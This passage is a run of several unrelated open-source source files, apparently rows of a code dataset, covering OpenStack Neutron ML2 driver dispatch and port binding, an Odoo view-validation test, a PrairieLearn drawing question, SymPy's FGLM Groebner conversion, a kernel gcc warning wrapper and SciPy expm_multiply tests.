drivers are called in this case.
"""
self._call_on_drivers("create_network_postcommit", context)
def update_network_precommit(self, context):
"""Notify all mechanism drivers during network update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_network_precommit", context)
def update_network_postcommit(self, context):
"""Notify all mechanism drivers after network update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_network_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_network_postcommit", context,
continue_on_failure=True)
def delete_network_precommit(self, context):
"""Notify all mechanism drivers during network deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_network_precommit", context)
def delete_network_postcommit(self, context):
"""Notify all mechanism drivers after network deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_network_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
network resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
network.
"""
self._call_on_drivers("delete_network_postcommit", context,
continue_on_failure=True)
def create_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("create_subnet_precommit", context)
def create_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_subnet_postcommit call fails.
Called after the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propagated
to the caller, where the subnet will be deleted, triggering
any required cleanup. There is no guarantee that all mechanism
drivers are called in this case.
"""
self._call_on_drivers("create_subnet_postcommit", context)
def update_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_subnet_precommit", context)
def update_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_subnet_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_subnet_postcommit", context,
continue_on_failure=True)
def delete_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_subnet_precommit", context)
def delete_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_subnet_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
subnet resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
subnet.
"""
self._call_on_drivers("delete_subnet_postcommit", context,
continue_on_failure=True)
def create_port_precommit(self, context):
"""Notify all mechanism drivers during port creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("create_port_precommit", context)
def create_port_postcommit(self, context):
"""Notify all mechanism drivers of port creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_port_postcommit call fails.
Called after the database transaction. Errors raised by
mechanism drivers are left to propagate to the caller, where
the port will be deleted, triggering any required
cleanup. There is no guarantee that all mechanism drivers are
called in this case.
"""
self._call_on_drivers("create_port_postcommit", context)
def update_port_precommit(self, context):
"""Notify all mechanism drivers during port update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_port_precommit", context)
def update_port_postcommit(self, context):
"""Notify all mechanism drivers after port update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_port_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_port_postcommit", context,
continue_on_failure=True)
def delete_port_precommit(self, context):
"""Notify all mechanism drivers during port deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_port_precommit", context)
def delete_port_postcommit(self, context):
"""Notify all mechanism drivers after port deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_port_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
port resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
port.
"""
self._call_on_drivers("delete_port_postcommit", context,
continue_on_failure=True)
    def bind_port(self, context):
        """Attempt to bind a port using registered mechanism drivers.

        :param context: PortContext instance describing the port

        Called outside any transaction to attempt to establish a port
        binding.
        """
        binding = context._binding
        LOG.debug("Attempting to bind port %(port)s on host %(host)s "
                  "for vnic_type %(vnic_type)s with profile %(profile)s",
                  {'port': context.current['id'],
                   'host': context.host,
                   'vnic_type': binding.vnic_type,
                   'profile': binding.profile})
        # Discard any binding levels left over from a previous attempt
        # before starting the recursive binding walk at level 0.
        context._clear_binding_levels()
        if not self._bind_port_level(context, 0,
                                     context.network.network_segments):
            # No driver chain could bind the port; record the failure on
            # the binding so callers can surface it.
            binding.vif_type = portbindings.VIF_TYPE_BINDING_FAILED
            LOG.error(_LE("Failed to bind port %(port)s on host %(host)s"),
                      {'port': context.current['id'],
                       'host': context.host})
    def _bind_port_level(self, context, level, segments_to_bind):
        """Recursively try each mechanism driver to bind one level.

        :param context: PortContext describing the port being bound
        :param level: current depth in the hierarchical binding chain
        :param segments_to_bind: segments offered to drivers at this level
        :returns: True if this level (and all deeper levels a driver
            requested) bound successfully, False otherwise
        """
        binding = context._binding
        port_id = context._port['id']
        LOG.debug("Attempting to bind port %(port)s on host %(host)s "
                  "at level %(level)s using segments %(segments)s",
                  {'port': port_id,
                   'host': context.host,
                   'level': level,
                   'segments': segments_to_bind})
        # Hard cap on recursion depth to guarantee termination.
        if level == MAX_BINDING_LEVELS:
            LOG.error(_LE("Exceeded maximum binding levels attempting to bind "
                          "port %(port)s on host %(host)s"),
                      {'port': context.current['id'],
                       'host': context.host})
            return False
        for driver in self.ordered_mech_drivers:
            # Skip drivers that already bound one of these segments at a
            # shallower level (binding-loop prevention).
            if not self._check_driver_to_bind(driver, segments_to_bind,
                                              context._binding_levels):
                continue
            try:
                context._prepare_to_bind(segments_to_bind)
                driver.obj.bind_port(context)
                segment = context._new_bound_segment
                if segment:
                    context._push_binding_level(
                        models.PortBindingLevel(port_id=port_id,
                                                host=context.host,
                                                level=level,
                                                driver=driver.name,
                                                segment_id=segment))
                    next_segments = context._next_segments_to_bind
                    if next_segments:
                        # Continue binding another level.
                        if self._bind_port_level(context, level + 1,
                                                 next_segments):
                            return True
                        else:
                            # Deeper levels failed; undo this driver's
                            # level and let the next driver try.
                            context._pop_binding_level()
                    else:
                        # Binding complete.
                        LOG.debug("Bound port: %(port)s, "
                                  "host: %(host)s, "
                                  "vif_type: %(vif_type)s, "
                                  "vif_details: %(vif_details)s, "
                                  "binding_levels: %(binding_levels)s",
                                  {'port': port_id,
                                   'host': context.host,
                                   'vif_type': binding.vif_type,
                                   'vif_details': binding.vif_details,
                                   'binding_levels': context.binding_levels})
                        return True
            except Exception:
                # A misbehaving driver must not abort the whole walk;
                # log it and move on to the next driver.
                LOG.exception(_LE("Mechanism driver %s failed in "
                                  "bind_port"),
                              driver.name)
        binding.vif_type = portbindings.VIF_TYPE_BINDING_FAILED
        LOG.error(_LE("Failed to bind port %(port)s on host %(host)s"),
                  {'port': context._port['id'],
                   'host': binding.host})
def _check_driver_to_bind(self, driver, segments_to_bind, binding_levels):
# To prevent a possible binding loop, don't try to bind with
# this driver if the same driver has already bound at a higher
# level to one of the segments we are currently trying to
# bind. Note that is is OK for the same driver to bind at
# multiple levels using different segments.
for level in binding_levels:
if (level.driver == driver and
level.segment_id in segments_to_bind):
return False
return True
class ExtensionManager(stevedore.named.NamedExtensionManager):
"""Manage extension drivers using drivers."""
def __init__(self):
# Ordered list of extension drivers, defining
# the order in which the drivers are called.
self.ordered_ext_drivers = []
LOG.info(_LI("Configured extension driver names: %s"),
cfg.CONF.ml2.extension_drivers)
super(ExtensionManager, self).__init__('neutron.ml2.extension_drivers',
cfg.CONF.ml2.extension_drivers,
invoke_on_load=True,
name_order=True)
LOG.info(_LI("Loaded extension driver names: %s"), self.names())
self._register_drivers()
def _register_drivers(self):
"""Register all extension drivers.
This method should only be called once in the ExtensionManager
constructor.
"""
for ext in self:
self.ordered_ext_drivers.append(ext)
LOG.info(_LI("Registered extension drivers: %s"),
[driver.name for driver in self.ordered_ext_drivers])
def initialize(self):
# Initialize each driver in the list.
for driver in self.ordered_ext_drivers:
LOG.info(_LI("Initializing extension driver '%s'"), driver.name)
driver.obj.initialize()
def extension_aliases(self):
exts = []
for driver in self.ordered_ext_drivers:
alias = driver.obj.extension_alias
exts.append(alias)
LOG.info(_LI("Got %(alias)s extension from driver '%(drv)s'"),
{'alias': alias, 'drv': driver.name})
return exts
def _call_on_ext_drivers(self, method_name, plugin_context, data, result):
"""Helper method for calling a method across all extension drivers."""
for driver in self.ordered_ext_drivers:
try:
getattr(driver.obj, method_name)(plugin_context, data, result)
except Exception:
LOG.exception(
_LE("Extension driver '%(name)s' failed in %(method)s"),
{'name': driver.name, 'method': method_name}
)
def process_create_network(self, plugin_context, data, result):
"""Notify all extension drivers during network creation."""
self._call_on_ext_drivers("process_create_network", plugin_context,
data, result)
def process_update_network(self, plugin_context, data, result):
"""Notify all extension drivers during network update."""
self._call_on_ext_drivers("process_update_network", plugin_context,
data, result)
def process_create_subnet(self, plugin_context, data, result):
"""Notify all extension drivers during subnet creation."""
self._call_on_ext_drivers("process_create_subnet", plugin_context,
data, result)
def process_update_subnet(self, plugin_context, data, result):
"""Notify all extension drivers during subnet update."""
self._call_on_ext_drivers("process_update_subnet", plugin_context,
data, result)
def process_create_port(self, plugin_context, data, result):
"""Notify all extension drivers during port creation."""
self._call_on_ext_drivers("process_create_port", plugin_context,
data, result)
def process_update_port(self, plugin_context, data, result):
"""Notify all extension drivers during port update."""
self._call_on_ext_drivers("process_update_port", plugin_context,
data, result)
def extend_network_dict(self, session, base_model, result):
"""Notify all extension drivers to extend network dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_network_dict(session, base_model, result)
LOG.debug("Extended network dict for driver '%(drv)s'",
{'drv': driver.name})
def extend_subnet_dict(self, session, base_model, result):
"""Notify all extension drivers to extend subnet dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_subnet_dict(session, base_model, result)
LOG.debug("Extended subnet dict for driver '%(drv)s'",
{'drv': driver.name})
def extend_port_dict(self, session, base_model, result):
"""Notify all extension drivers to extend port dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_port_dict(session, base_model, result)
LOG.debug("Extended port dict for driver '%(drv)s'",
{'drv': driver.name})
| apache-2.0 |
goliveirab/odoo | openerp/addons/base/tests/test_view_validation.py | 396 | 3427 | # This test can be run stand-alone with something like:
# > PYTHONPATH=. python2 openerp/tests/test_view_validation.py
from lxml import etree
from StringIO import StringIO
import unittest2
from openerp.tools.view_validation import (valid_page_in_book, valid_att_in_form, valid_type_in_colspan,
valid_type_in_col, valid_att_in_field, valid_att_in_label,
valid_field_in_graph, valid_field_in_tree
)
invalid_form = etree.parse(StringIO('''\
<form>
<label></label>
<group>
<div>
<page></page>
<label colspan="True"></label>
<field></field>
</div>
</group>
<notebook>
<page>
<group col="Two">
<div>
<label></label>
<field colspan="Five"> </field>
</div>
</group>
</page>
</notebook>
</form>
''')).getroot()
valid_form = etree.parse(StringIO('''\
<form string="">
<field name=""></field>
<field name=""></field>
<notebook>
<page>
<field name=""></field>
<label string=""></label>
<field name=""></field>
</page>
<page>
<group colspan="5" col="2">
<label for=""></label>
<label string="" colspan="5"></label>
</group>
</page>
</notebook>
</form>
''')).getroot()
invalid_graph = etree.parse(StringIO('''\
<graph>
<label/>
<group>
<div>
<field></field>
<field></field>
</div>
</group>
</graph>
''')).getroot()
valid_graph = etree.parse(StringIO('''\
<graph string="">
<field name=""></field>
<field name=""></field>
</graph>
''')).getroot()
invalid_tree = etree.parse(StringIO('''\
<tree>
<group>
<div>
<field></field>
<field></field>
</div>
</group>
</tree>
''')).getroot()
valid_tree = etree.parse(StringIO('''\
<tree string="">
<field name=""></field>
<field name=""></field>
<button/>
<field name=""></field>
</tree>
''')).getroot()
class test_view_validation(unittest2.TestCase):
    """ Test the view validation code (but not the views themselves). """
    # Each test checks one validator against the module-level
    # invalid_*/valid_* fixture documents parsed above.
    def test_page_validation(self):
        # fixtures: <page> outside a <notebook> is rejected.
        assert not valid_page_in_book(invalid_form)
        assert valid_page_in_book(valid_form)
    def test_all_field_validation(self):
        # fixtures: <field> without a name attribute is rejected.
        assert not valid_att_in_field(invalid_form)
        assert valid_att_in_field(valid_form)
    def test_all_label_validation(self):
        # fixtures: <label> without string/for attributes is rejected.
        assert not valid_att_in_label(invalid_form)
        assert valid_att_in_label(valid_form)
    def test_form_string_validation(self):
        assert valid_att_in_form(valid_form)
    def test_graph_validation(self):
        # fixtures: non-<field> children inside <graph> are rejected.
        assert not valid_field_in_graph(invalid_graph)
        assert valid_field_in_graph(valid_graph)
    def test_tree_validation(self):
        assert not valid_field_in_tree(invalid_tree)
        assert valid_field_in_tree(valid_tree)
    def test_colspan_datatype_validation(self):
        # fixtures: colspan="True"/"Five" are rejected, "5" accepted.
        assert not valid_type_in_colspan(invalid_form)
        assert valid_type_in_colspan(valid_form)
    def test_col_datatype_validation(self):
        assert not valid_type_in_col(invalid_form)
        assert valid_type_in_col(valid_form)
| agpl-3.0 |
mwest1066/PrairieLearn | exampleCourse/questions/demoDrawingInclinedPlane/server.py | 3 | 2014 | import random
import math
import numpy as np
def generate(data):
height_canvas = 400
data["params"]["height_canvas"] = height_canvas
a = random.choice([80,100,120])
b = random.choice([140,150,160])
c = random.choice([180,190,200,210])
data["params"]["a"] = a
data["params"]["b"] = b
data["params"]["c"] = c
x1 = 80
y1 = height_canvas - 80
x2 = x1 + a
y2 = y1 - c
x3 = x2 + b
y3 = y2
x0 = x2
y0 = y1
data["params"]["x0"] = x0
data["params"]["y0"] = y0
data["params"]["x1"] = x1
data["params"]["y1"] = y1
data["params"]["x2"] = x2
data["params"]["y2"] = y2
data["params"]["x3"] = x3
data["params"]["y3"] = y3
circle_radius = 40
data["params"]["circle_radius"] = circle_radius
angle = -random.choice([30,40,50])
theta_rad = angle*math.pi/180
data["params"]["theta"] = angle
data["params"]["normal_angle"] = angle - 90
rC = np.array([x3,y3])
e1 = np.array([math.cos(theta_rad), math.sin(theta_rad)])
e2 = np.array([-math.sin(theta_rad), math.cos(theta_rad)])
rD = rC + circle_radius*e2 - 100*e1
base_triangle = 120
rE = rD + np.array([ base_triangle,0])
height_triangle = base_triangle*math.tan(theta_rad)
rF = rE + np.array([0,height_triangle])
data["params"]["xD"] = rD[0]
data["params"]["yD"] = rD[1]
data["params"]["xE"] = rE[0]
data["params"]["yE"] = rE[1]
data["params"]["xF"] = rF[0]
data["params"]["yF"] = rF[1]
width_canvas = rE[0] + 80
data["params"]["width_canvas"] = width_canvas
data["params"]["xG"] = x1
data["params"]["yG"] = y2
data["params"]["xH"] = x3
data["params"]["yH"] = y1
width_arrow = 60
data["params"]["width_arrow"] = width_arrow
return data
| agpl-3.0 |
jaimahajan1997/sympy | sympy/polys/fglmtools.py | 21 | 4396 | """Implementation of matrix FGLM Groebner basis conversion algorithm. """
from __future__ import print_function, division
from sympy.polys.monomials import monomial_mul, monomial_div
from sympy.core.compatibility import range
def matrix_fglm(F, ring, O_to):
    """
    Converts the reduced Groebner basis ``F`` of a zero-dimensional
    ideal w.r.t. ``O_from`` to a reduced Groebner basis
    w.r.t. ``O_to``.

    :param F: reduced Groebner basis w.r.t. the order of ``ring``
    :param ring: polynomial ring of ``F``; its order plays ``O_from``
    :param O_to: target monomial order

    References
    ==========
    J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). Efficient
    Computation of Zero-dimensional Groebner Bases by Change of
    Ordering
    """
    domain = ring.domain
    ngens = ring.ngens
    ring_to = ring.clone(order=O_to)
    # Monomial basis of the quotient K[X]/(F) w.r.t. O_from, and the
    # multiplication-by-x_i matrices expressed in that basis.
    old_basis = _basis(F, ring)
    M = _representing_matrices(old_basis, F, ring)
    # V contains the normalforms (wrt O_from) of S
    S = [ring.zero_monom]
    V = [[domain.one] + [domain.zero] * (len(old_basis) - 1)]
    G = []
    L = [(i, 0) for i in range(ngens)]  # (i, j) corresponds to x_i * S[j]
    L.sort(key=lambda k_l: O_to(_incr_k(S[k_l[1]], k_l[0])), reverse=True)
    t = L.pop()
    # P accumulates the row operations that keep the vectors in V in
    # triangular form (see _update).
    P = _identity_matrix(len(old_basis), domain)
    while True:
        s = len(S)
        v = _matrix_mul(M[t[0]], V[t[1]])
        _lambda = _matrix_mul(P, v)
        if all(_lambda[i] == domain.zero for i in range(s, len(old_basis))):
            # there is a linear combination of v by V: the relation
            # becomes an element of the new Groebner basis.
            lt = ring.term_new(_incr_k(S[t[1]], t[0]), domain.one)
            rest = ring.from_dict({S[i]: _lambda[i] for i in range(s)})
            g = (lt - rest).set_ring(ring_to)
            if g:
                G.append(g)
        else:
            # v is linearly independant from V
            P = _update(s, _lambda, P)
            S.append(_incr_k(S[t[1]], t[0]))
            V.append(v)
            L.extend([(i, s) for i in range(ngens)])
            L = list(set(L))
            L.sort(key=lambda k_l: O_to(_incr_k(S[k_l[1]], k_l[0])), reverse=True)
        # Drop candidates already reducible by a new leading monomial.
        L = [(k, l) for (k, l) in L if all(monomial_div(_incr_k(S[l], k), g.LM) is None for g in G)]
        if not L:
            G = [ g.monic() for g in G ]
            return sorted(G, key=lambda g: O_to(g.LM), reverse=True)
        t = L.pop()
def _incr_k(m, k):
return tuple(list(m[:k]) + [m[k] + 1] + list(m[k + 1:]))
def _identity_matrix(n, domain):
M = [[domain.zero]*n for _ in range(n)]
for i in range(n):
M[i][i] = domain.one
return M
def _matrix_mul(M, v):
return [sum([row[i] * v[i] for i in range(len(v))]) for row in M]
def _update(s, _lambda, P):
"""
Update ``P`` such that for the updated `P'` `P' v = e_{s}`.
"""
k = min([j for j in range(s, len(_lambda)) if _lambda[j] != 0])
for r in range(len(_lambda)):
if r != k:
P[r] = [P[r][j] - (P[k][j] * _lambda[r]) / _lambda[k] for j in range(len(P[r]))]
P[k] = [P[k][j] / _lambda[k] for j in range(len(P[k]))]
P[k], P[s] = P[s], P[k]
return P
def _representing_matrices(basis, G, ring):
    r"""
    Compute the matrices corresponding to the linear maps `m \mapsto
    x_i m` for all variables `x_i`.

    :param basis: monomial basis of the quotient ring (see ``_basis``)
    :param G: Groebner basis used for normal-form reduction
    :param ring: the polynomial ring
    :returns: one matrix (nested lists over ``ring.domain``) per variable
    """
    domain = ring.domain
    u = ring.ngens-1
    def var(i):
        # Exponent tuple of the single variable x_i.
        return tuple([0] * i + [1] + [0] * (u - i))
    def representing_matrix(m):
        # Column i holds the coordinates of the normal form of
        # m * basis[i] with respect to ``basis``.
        M = [[domain.zero] * len(basis) for _ in range(len(basis))]
        for i, v in enumerate(basis):
            r = ring.term_new(monomial_mul(m, v), domain.one).rem(G)
            for monom, coeff in r.terms():
                j = basis.index(monom)
                M[j][i] = coeff
        return M
    return [representing_matrix(var(i)) for i in range(u + 1)]
def _basis(G, ring):
    r"""
    Computes a list of monomials which are not divisible by the leading
    monomials wrt to ``O`` of ``G``. These monomials are a basis of
    `K[X_1, \ldots, X_n]/(G)`.
    """
    order = ring.order
    leading_monomials = [g.LM for g in G]
    # Walk outward from the unit monomial: a monomial is in the basis
    # iff it is divisible by no leading monomial of G.
    candidates = [ring.zero_monom]
    basis = []
    while candidates:
        t = candidates.pop()
        basis.append(t)
        new_candidates = [_incr_k(t, k) for k in range(ring.ngens)
                          if all(monomial_div(_incr_k(t, k), lmg) is None
                                 for lmg in leading_monomials)]
        candidates.extend(new_candidates)
        candidates.sort(key=lambda m: order(m), reverse=True)
    # The same monomial can be reached along several paths, so
    # deduplicate before the final sort.
    basis = list(set(basis))
    return sorted(basis, key=lambda m: order(m))
chrisk44/android_kernel_lge_hammerhead | scripts/gcc-wrapper.py | 181 | 3495 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"hci_conn.c:407",
"cpufreq_interactive.c:804",
"cpufreq_interactive.c:847",
"ene_ub6250.c:2118",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
    """Decode the message from gcc. The messages we care about have a filename, and a warning"""
    line = line.rstrip('\n')
    m = warning_re.match(line)
    # group(2) is the "file.ext:line" portion -- the same key format
    # used by the allowed_warnings whitelist above.
    if m and m.group(2) not in allowed_warnings:
        print "error, forbidden warning:", m.group(2)
        # If there is a warning, remove any object if it exists.
        if ofile:
            try:
                os.remove(ofile)
            except OSError:
                pass
        # Abort the whole compile so the warning cannot slip through.
        sys.exit(1)
def run_gcc():
    """Run the real compiler with the wrapper's arguments, scanning its
    stderr for forbidden warnings; returns the compiler exit status (or
    an errno if the compiler could not be started)."""
    # sys.argv[1:] is "<real-compiler> <compiler args...>"; the wrapper
    # itself is argv[0].
    args = sys.argv[1:]
    # Look for -o
    try:
        i = args.index('-o')
        global ofile
        ofile = args[i+1]
    except (ValueError, IndexError):
        pass
    # NOTE(review): 'compiler' is assigned but never used.
    compiler = sys.argv[0]
    try:
        proc = subprocess.Popen(args, stderr=subprocess.PIPE)
        # Echo each stderr line and check it against the whitelist;
        # interpret_warning() exits the process on a forbidden warning.
        for line in proc.stderr:
            print line,
            interpret_warning(line)
        result = proc.wait()
    except OSError as e:
        result = e.errno
        if result == errno.ENOENT:
            print args[0] + ':',e.strerror
            print 'Is your PATH set correctly?'
        else:
            print ' '.join(args), str(e)
    return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
| gpl-2.0 |
arokem/scipy | scipy/sparse/linalg/tests/test_expm_multiply.py | 1 | 9651 | """Test functions for the sparse.linalg._expm_multiply module
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_allclose, assert_, assert_equal,
suppress_warnings)
from scipy.sparse import SparseEfficiencyWarning
import scipy.linalg
from scipy.sparse.linalg._expm_multiply import (_theta, _compute_p_max,
_onenormest_matrix_power, expm_multiply, _expm_multiply_simple,
_expm_multiply_interval)
def less_than_or_close(a, b):
return np.allclose(a, b) or (a < b)
class TestExpmActionSimple(object):
    """
    These tests do not consider the case of multiple time steps in one call.
    """
    def test_theta_monotonicity(self):
        # The _theta table (m -> theta_m) must be strictly increasing in m.
        pairs = sorted(_theta.items())
        for (m_a, theta_a), (m_b, theta_b) in zip(pairs[:-1], pairs[1:]):
            assert_(theta_a < theta_b)
    def test_p_max_default(self):
        # Known value: _compute_p_max(55) must be 8.
        m_max = 55
        expected_p_max = 8
        observed_p_max = _compute_p_max(m_max)
        assert_equal(observed_p_max, expected_p_max)
    def test_p_max_range(self):
        # p_max is the largest p satisfying p*(p-1) <= m_max + 1;
        # check both the bound and its tightness for every m_max.
        for m_max in range(1, 55+1):
            p_max = _compute_p_max(m_max)
            assert_(p_max*(p_max - 1) <= m_max + 1)
            p_too_big = p_max + 1
            assert_(p_too_big*(p_too_big - 1) > m_max + 1)
    def test_onenormest_matrix_power(self):
        # The 1-norm estimate of A**p must bracket the exact norm
        # within a factor of 3 in both directions.
        np.random.seed(1234)
        n = 40
        nsamples = 10
        for i in range(nsamples):
            A = scipy.linalg.inv(np.random.randn(n, n))
            for p in range(4):
                if not p:
                    M = np.identity(n)
                else:
                    M = np.dot(M, A)
                estimated = _onenormest_matrix_power(A, p)
                exact = np.linalg.norm(M, 1)
                assert_(less_than_or_close(estimated, exact))
                assert_(less_than_or_close(exact, 3*estimated))
    def test_expm_multiply(self):
        # expm_multiply(A, B) must match the dense reference expm(A).dot(B).
        np.random.seed(1234)
        n = 40
        k = 3
        nsamples = 10
        for i in range(nsamples):
            A = scipy.linalg.inv(np.random.randn(n, n))
            B = np.random.randn(n, k)
            observed = expm_multiply(A, B)
            expected = np.dot(scipy.linalg.expm(A), B)
            assert_allclose(observed, expected)
    def test_matrix_vector_multiply(self):
        # Same as test_expm_multiply but with a 1-D vector operand.
        np.random.seed(1234)
        n = 40
        nsamples = 10
        for i in range(nsamples):
            A = scipy.linalg.inv(np.random.randn(n, n))
            v = np.random.randn(n)
            observed = expm_multiply(A, v)
            expected = np.dot(scipy.linalg.expm(A), v)
            assert_allclose(observed, expected)
    def test_scaled_expm_multiply(self):
        # With a time scale t, the result must match expm(t*A).dot(B).
        np.random.seed(1234)
        n = 40
        k = 3
        nsamples = 10
        for i in range(nsamples):
            for t in (0.2, 1.0, 1.5):
                with np.errstate(invalid='ignore'):
                    A = scipy.linalg.inv(np.random.randn(n, n))
                    B = np.random.randn(n, k)
                    observed = _expm_multiply_simple(A, B, t=t)
                    expected = np.dot(scipy.linalg.expm(t*A), B)
                    assert_allclose(observed, expected)
    def test_scaled_expm_multiply_single_timepoint(self):
        # Small fixed-size sanity check at one time point.
        np.random.seed(1234)
        t = 0.1
        n = 5
        k = 2
        A = np.random.randn(n, n)
        B = np.random.randn(n, k)
        observed = _expm_multiply_simple(A, B, t=t)
        expected = scipy.linalg.expm(t*A).dot(B)
        assert_allclose(observed, expected)
    def test_sparse_expm_multiply(self):
        # Sparse operand A: result must agree with the dense reference.
        np.random.seed(1234)
        n = 40
        k = 3
        nsamples = 10
        for i in range(nsamples):
            A = scipy.sparse.rand(n, n, density=0.05)
            B = np.random.randn(n, k)
            observed = expm_multiply(A, B)
            with suppress_warnings() as sup:
                # The dense reference path triggers sparse-efficiency warnings
                # that are irrelevant to what is being tested here.
                sup.filter(SparseEfficiencyWarning,
                           "splu requires CSC matrix format")
                sup.filter(SparseEfficiencyWarning,
                           "spsolve is more efficient when sparse b is in the CSC matrix format")
